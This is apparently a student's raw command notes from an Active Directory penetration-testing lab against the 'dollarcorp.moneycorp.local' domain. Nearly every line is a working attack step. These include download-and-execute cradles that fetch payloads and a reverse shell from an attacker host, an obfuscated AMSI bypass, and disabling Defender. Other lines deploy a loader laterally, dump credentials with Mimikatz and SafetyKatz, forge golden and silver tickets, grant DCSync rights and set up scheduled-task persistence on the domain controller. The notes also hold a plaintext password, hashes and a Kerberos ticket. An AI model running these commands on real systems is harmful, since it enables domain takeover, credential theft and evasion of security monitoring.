PS C:\Tools\ADModule-master> Get-NetComputer -Properties samaccountname, samaccounttype
powershell.exe "iex (New-Object Net.WebClient).DownloadString('http://172.16.99.22:8001/payload')"
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.22:8080/PowerView.ps1'))
iex (iwr http://172.16.100.22:8080/sbloggingbypass.txt -UseBasicParsing).
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22"
$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
svcadmin
*ThisisBlasphemyThisisMadness!!
This account is using a service on dcorp-mgmt
2:12:20
iwr http://172.16.100.22/Loader.exe -OutFile C:\Users\Public\Loader.exe
iwr http://172.16.100.22/sblogging.txt -UseBasicParsing)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22"
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe /Y
Copy loader: echo F | xcopy C:\AD\Tools\Loader.exe \\admin-srv\C$\Users\Public\Loader.exe
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableRealtimeMonitoring $true -VerboseS
Copy-Item C:\AD\Tools\Loader.exe \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
c
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-adminsrv\C$\'Program Files'\Loader.exe /Y
echo F | xcopy C:\AD\Tools\Loader.exe "\\dcorp-adminsrv\C$\Program Files\Loader.exe" /Y
net group "Domain Admins" dcorp\student522 /ADD /moneycorp.local
Invoke-Mimikatz -Command '"kerberos::golden /user:svcadmin /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /ptt"'
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
Invoke-Mimikatz -Command '"misc::cmd:"'
d655572e8c8af4600b90db0e104761c0
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:d655572e8c8af4600b90db0e104761c0 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
doIFxTCCBcGgAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBDYwggQyoAMCARKhAwIBAqKCBCQEggQg9wPzh/3m/r9AcuIzsZ6lJoFz3/0DvVjGCpzkdTdTX1WLLxoyJPBwcLotaW4oXHV/kzFTijDw/0Fe9+Uqwmh33TXIefsPDL8AJNJHQWqzbk4EKY7RUZMEwVQkk9iLVxHwEzEEvOSr83AsuRPebOnuPMEhD+JcG5I9IpcsnhlOL3FuB2cd3D/wVzKWY4HYxjKCpLEnCW6MDqozJcdVlN0uiRhxdWboZgy13fWOOFLpewjifcOq7mXkcKhzRSXItl1E5VWDDH4c3wPuGNG/yKKftZx25zeAwNZg9Sefn5W2CNkHc4Vcii3mKC6lSpa5lrKhkIT4Ghlhh+thtyQpa0foQzksXTK2DdQvZOet9sCcQQ6qCnf5LXmW02uwiarglCLGlpZMdU9vr50ahigkoXzWep9/ZgGQ54m+ozlWI3LI5NckqHCru9r2UyD/BSGMvs/9DcdNr3p8r0nA2k4B0j3PLKnTPFK1yiCuWM/SU4kFWzDCY1gPhy6r8VlaBGzDrg8+AV+9I+dXEkEQmBk1nzSZjIBSlLwrp+HzGKNfnrOohdAU/o/qwCnOU1Fdavw5GC+gYeRYVp0etEq3Jl1K+WUGXJ/gQQ/jSqKJgRjioz6ZTfQ0tEY1TxwG4nEDX3h3kdrKhiUvqjPAX93GTwgnD9oitASqS0nzRkHJKMdTM4a90P9F3g/1Q3GkkEHDYtOJ61vphwz4GoBL3OQkwWvDGMuGsJNq2bEbx9gvjOxsth+4EU7pKFqg4mBxjU9PUWp+5svP3BqfYX6PubWiaFR8b6wvqUH0lx299Td4bol8q3nsT1Z06Ktw3/E3L/a8m8zFz6fr5Nc0JbPC6cSy6dd5gLvfvTnvgopCDqqFa736ySKr5Qic+l+VS0ZlqnTx6KB8v7JPVH2WlCgipjWLC7t2sj2BZ82AVKhSD/jKEsjTb9hUCau/te7n1g3u8gWPD3uJUCisiZbCCbsoigumb2W4+oCVRfsNQXzqrjizPo5zPHRBLWFCqkudXnx4XTuiUikOFhv/TC8i3g5q2xk2Y5RZ7Hi+e3zoSpaDhXjsIrMy8rF/ECmEHIMKx9HYArnswqlzMb8nslzzI1QlHww1vl28vxvhQjgSgnAv3tjNi/pGTK19K7JxkODY6xOwAmopnY/IM8zlfzj66Wkn20dJbA+I3+gGHjzke//0hSsNtIDXPBrrZsYiPygA0moiFm0iLG55BrjcIWvO2T1mQVBwdqmEciTkOblsgOt9q7hAOATFIvNUPTyUIULlNcrmGQnzqW+LSABcPsWKxMddMBgdTPbafUmA0Jq4lE39tjqM0JS3E1hUpzaGLXrGEg1zHEdbDgbFfflD/meWNI0/Kuh/PSRn5wGnSG7MFLM1DWv1ndTO3RlpKUWDJHekm5q9lPBWvaqM0T2Yo4IBFTCCARGgAwIBAKKCAQgEggEEfYIBADCB/aCB+jCB9zCB9KArMCmgAwIBEqEiBCCXdJZWnoaQ616ZQGH38bfVLSNOqLEHhJKMmq0P4w2CIaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIWMBSgAwIBAaENMAsbCURDT1JQLURDJKMHAwUAYKEAAKURGA8yMDIyMDEyNjE2NDAzNlqmERgPMjAyMjAxMjcwMjQwMDZapxEYDzIwMjIwMjAyMTY0MDA2WqgcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9D
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Find
InterestingDomainAcl ResolveGUIDs
IdentityReferenceName match RDPUsers
sekurlsa::ekeys
Set-DomainObject -Identity Control522User -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired | ?{_.SamAccountName -math "Control522User"}
schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.22:8080/Invoke-PowerShellTcpEx.ps1''')'"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:d655572e8c8af4600b90db0e104761c0 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student522") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student522 -Rights DCSync -Verbose
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student522"}
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student522 -Rights DCSync -Ve
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=Local' - PrincipalIdentity student522 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 ptt"'
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=Local' - PrincipalIdentity student522 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:b5dd4f019ba84bebf7af108447f8e2de /user:Administrator/ptt"'
Set-RemoteWMI -SamAccountName student522 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
Find-InterestingDomainAcl -ResolveGUIDs -IdentityReferenceName match "RDPUsers"
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
(A;CI;Permissions String;;;SID)
Get-ForestDomain | %{Get-DomainTrust -Domain $.Name} | ?{$.TrustAttributes -eq "FILTER_SIDS"}